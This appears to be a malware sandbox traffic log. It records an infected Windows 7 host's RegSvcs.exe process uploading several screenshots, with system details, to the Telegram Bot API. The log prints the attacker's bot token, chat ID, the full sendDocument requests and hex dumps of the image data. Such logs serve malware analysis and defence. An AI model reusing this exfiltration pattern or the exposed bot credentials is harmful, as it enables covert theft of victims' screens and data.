2022-04-08 10:14:04 UTC	1374	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:04 UTC	1389	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:04 UTC	1405	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:04 UTC	1421	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:04 UTC	1437	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:04 UTC	1439	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 33 30 61 62 62 36 38 32 33 2d 2d 0d 0a Data Ascii: -----------------------------8da19730abb6823--
2022-04-08 10:14:04 UTC	1439	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:04 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":132,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412844,"document":{"file_name":"user-082561 2022-04-08 03-18-31.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4RiUArswI0et81v2Ry1-3Bxyo3I0gAC-AoAAkCUgFLRDt23a0rBzAEAB20AAyME","file_unique_id":"AQAD-AoAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOEYlAK7MCNHrfNb9kctftwccqNyNIAAvgKAAJAlIBS0Q7dt2tKwcwjBA","file_unique_id":"AgAD-AoAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.22	49183	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:09 UTC	1441	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1975d63c36dc Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:09 UTC	1441	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:09 UTC	1441	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 35 64 36 33 63 33 36 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 35 64 36 33 63 33 36 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da1975d63c36dcContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da1975d63c36dcContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:09 UTC	1442	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:09 UTC	1458	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:09 UTC	1474	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:09 UTC	1490	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:09 UTC	1505	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:09 UTC	1521	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:09 UTC	1537	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:09 UTC	1553	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:09 UTC	1555	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 35 64 36 33 63 33 36 64 63 2d 2d 0d 0a Data Ascii: -----------------------------8da1975d63c36dc--
2022-04-08 10:14:09 UTC	1555	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:09 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":133,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412849,"document":{"file_name":"user-082561 2022-04-08 03-38-32.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4ViUArxGCl5oQcDwTfHkrBFGlZdIAAC-QoAAkCUgFJbtI2fyXvk0QEAB20AAyME","file_unique_id":"AQAD-QoAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOFYlAK8RgpeaEHA8E3x5KwRRpWXSAAAvkKAAJAlIBSW7SNn8l75NEjBA","file_unique_id":"AgAD-QoAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.22	49184	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:14 UTC	1556	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da1978a1b83814 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:14 UTC	1556	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:14 UTC	1556	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 38 61 31 62 38 33 38 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 38 61 31 62 38 33 38 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da1978a1b83814Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da1978a1b83814Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:14 UTC	1557	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:14 UTC	1573	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: 